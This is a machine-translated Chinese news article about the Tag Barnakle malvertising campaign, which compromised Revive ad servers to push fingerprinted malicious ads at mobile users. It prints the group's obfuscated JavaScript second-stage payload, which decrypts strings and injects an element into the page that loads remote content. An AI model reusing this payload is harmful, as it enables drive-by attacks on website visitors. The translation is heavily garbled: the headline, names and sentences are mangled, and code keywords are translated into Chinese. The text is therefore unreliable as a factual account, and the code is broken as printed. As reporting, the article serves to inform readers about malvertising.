数百万个腹部冲浪者是由一个恶性的群体瞄准

2021-04-20 04:22:35

在过去的一年里,黑客在过去一年中遭到了120多台广告服务器,在正在进行的活动中展示了数千万的持续广告,如果不是他们访问网站,那么通过所有向外外观都是良性的。

恶意是在访问受信任网站时向人们提供广告的做法。广告嵌入了JavaScript,偷偷摸摸地利用软件缺陷或尝试诱骗访问者安装不安全的应用程序,支付欺诈性计算机支助费,或采取其他有害行动。通常,此互联网祸害后面的诈骗者作为买家构成,并支付广告交付网络,以显示个人网站上的恶意广告。

渗透AD生态系统通过造成合法买家需要资源。对于一个,诈骗者必须投入时间学习市场如何运作,然后创建具有值得信赖的声誉的实体。该方法还需要支付金钱购买恶意广告的空间。这不是一种经济型公司认为拨打arnakle的恶意组使用的技术。

“Tag Barnakle,另一方面,通过直接绕过广告服务基础设施的颈部质量妥协,”Eliya Stein在星期一发布的博客文章中写道,可以完全绕过这一首次障碍。“ “可能的是,他们也能够促进投资回报率[投资回报],这将以其竞争对手黯然失色,因为他们不需要花费一毛钱来运行广告活动。”

在过去的一年中,Tag Barnakle感染了超过120台服务器,该服务器运行Revive,这是一个想要运行自己的广告服务器的组织的开源应用程序,而不是依赖于第三方服务。 120个数字是去年发现的受感染恢复服务器的数量的两倍。

一旦它损坏了广告服务器,标记Barnakle会加载Moiliack的有效载荷。为了逃避检测,该组使用客户端指纹识别来确保只有少数最具吸引力的目标接收恶意广告。为这些目标提供次要有效载荷的服务器也使用具有粘附技术来确保它们在雷达下飞行。

当争辩于去年的arnakle上报告时,它发现该集团感染了大约60个复活服务器。壮举允许组在超过360个Web属性上分发广告。广告推动了伪造的Adobe Flash更新,在运行时安装了桌面计算机上的恶意软件。

这次,标签Barnakle是针对iPhone和Android用户的目标。通过受妥协服务器接收广告的网站提供高度混淆的JavaScript,该网页确定访问者是否使用iPhone或Android设备。

如果访问者通过它和其他指纹测试,它们会收到一个如下所示的二级有效负载:

var _0x209b = [" charcodeat"," fromcarcode"," atob","长度"];(函数(_0x58f22e,_0x209b77){var _0x3a54d6 =函数(_0x562d16){while(--_ 0x562d16){_ 0x58f22e ["按"" shift" shift"]());}}; _ 0x3a54d6(++ _ 0x209b77) ;}(_ 0x209b,0x1d9)); VAR _0x3a54 =函数(_0x58f22e,_0x209b77){_ 0x58f22e = _0x58f22e-为0x0; VAR _0x3a54d6 = _0x209b [_0x58f22e];返回_0x3a54d6;};功能pr7IbU3HZp6(_0x2df7f1,_0x4ed28f){风险_0x40b1c0 = [ ],_ 0xfa98e6 =为0x0,_0x1d2d3f,_0x4daddb ="&#34 ;;为(VAR _0xaefdd9 =为0x0; _0xaefdd9<为0x100; _0xaefdd9 ++){_ 0x40b1c0 [_0xaefdd9] = _ 0xaefdd9;}对于(_0xaefdd9 =为0x0; _0xaefdd9< 0x100的; _0xaefdd9 ++){_ 0xfa98e6 =(_ 0xfa98e6 + _0x40b1c0 [_0xaefdd9] + _ 0x4ed28f [" charCodeAt"](_ 0xaefdd9%_0x4ed28f [_0x3a54(" 0X2&#34)]))%0x100的_0x1d2d3f = _0x40b1c0 [_0xaefdd9],_ 0x40b1c0 [_0xaefdd9] = _ 0x40b1c0 [_0xfa98e6],_ 0x40b1c0 [_0xfa98e6] = _ 0x1d2d3f;} _ 0xaefdd9 =为0x0,_0xfa98e6 =为0x0;对于(VAR _0x2bdf25 =为0x0; _0x2bdf25< _0x2df7f1 [_0x3a54(" 0X2&#34 ;); _ 0x2bdf25 ++){_ 0xaefdd9 =(_ 0xaefdd9 + 0x1)%0 X100,_0xfa98e6 =(_ 0xfa98e6 + _0x40b1c0 [_0xaefdd9])%0x100的_0x1d2d3f = _0x40b1c0 [_0xaefdd9],_ 0x40b1c0 [_0xaefdd9] = _ 0x40b1c0 [_0xfa98e6],_ 0x40b1c0 [_0xfa98e6] = _ 0x1d2d3f,_0x4daddb + =字符串[_0x3a54("为0x0& #34;)](_ 0x2df7f1 [_0x3a54(" 0x3")](_ 0x2bdf25)^ _ 0x40b1c0 [(_ 0x40b1c0 [_0xefdd9] + _ 0x40b1c0 [_0xfa98e6])%0x100]);} return _0x4daddb;}函数fcp5trnehk( _0x2DEB18){var _0x3d61b2 ="&#34 ;;尝试{_0x3d61b2 =窗口[_0x3a54(" 0x1");} catch(_0x4b0a86){} return _0x3d61b2;}; var qixfjksy6bvd = [" bm2cdeoguagaqnegjwgxydanxs1bsqnre5ys6akl2hb2j0 + gf6il1n4vxdnf + d0 /"," dwutzutzo + sqsxe8ng =="和#34;"" y0d83rlb", " y0f69rbb65ug6d9y"," gytejruwfuw"," n3j6vw =="," n2tyrkwjoyyulkiprryr"," dfcgtizs"," dfcgtizs"," 34; ypnc"," 2vvpcuepsbzhste ="和#34; gfdzymhuebxrww4m"]; var abddgl0kzhomy5zl = document [pr7ibu3hzp6(fcp5trnehk(qixfjksy6bvd [1]),qixfjksy6bvd [2])]( PR7IBU3HZP6(FCP5TRNEHK(QIXFJKSY6BVD [3]),QIXFJKSY6BVD [5])); abddgl0kzhomy5zl [pr7ib U3HZP6(QIXFJKSY6BVD [4]),QIXFJKSY6BVD [5])(PR7BU3HZP6(FCP5TRNEHK(QIXFJKSY6BVD [6]),QIXFJKSY6BVD [8]),PR7BIBU3HZP6(FCP5TRNEHK(QIXFJKSY6BVD [7]),QIXFJKSY6BVD [8])); aBdDGL0KZhomY5Zl [pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD [4]),qIxFjKSY6BVD [5])](pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD [9]),qIxFjKSY6BVD [11]),pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD [0]),qIxFjKSY6BVD [2]) ); var bundle = document.body || document.documentelement; bundle [pr7ibu3hzp6(fcp5trnehk(qixfjksy6bvd [10]),qixfjksy6bvd [11])](abddgl0kzhomy5zl);

随着解除的代码显示,广告通过过度regalladean [。] COM,纠正的域被Propellerads使用,该域是一个广告网络,该网络包括恶意员工长期被记录为恶意的广告网络。

当纠正重播时,Propeller广告点击Tracks标签arnakle的类型上的跟踪器,他们看到了这样的广告:

该广告大多数诱惑了应用程序商店列表的目标,用于假设安全,安全或VPN应用程序,具有隐藏的订阅成本或“虹吸偏见的虹吸流量”。

通过经常与多个广告交换集成的广告服务器,广告有可能广泛地传播数百,可能的数千个个别网站。别人不知道有多少最终用户暴露于恶意,但公司认为这个数字很高。

“如果我们认为一些这些媒体公司有[Revive]与领先的程序化广告平台集成,则Barnakle的Reach的距离很容易在数亿种设备中,”Stein写道。 “这是一个保守的估计,考虑到他们烹饪受害者的事实,以便揭示低频率的有效载荷,可能会减缓他们的存在。”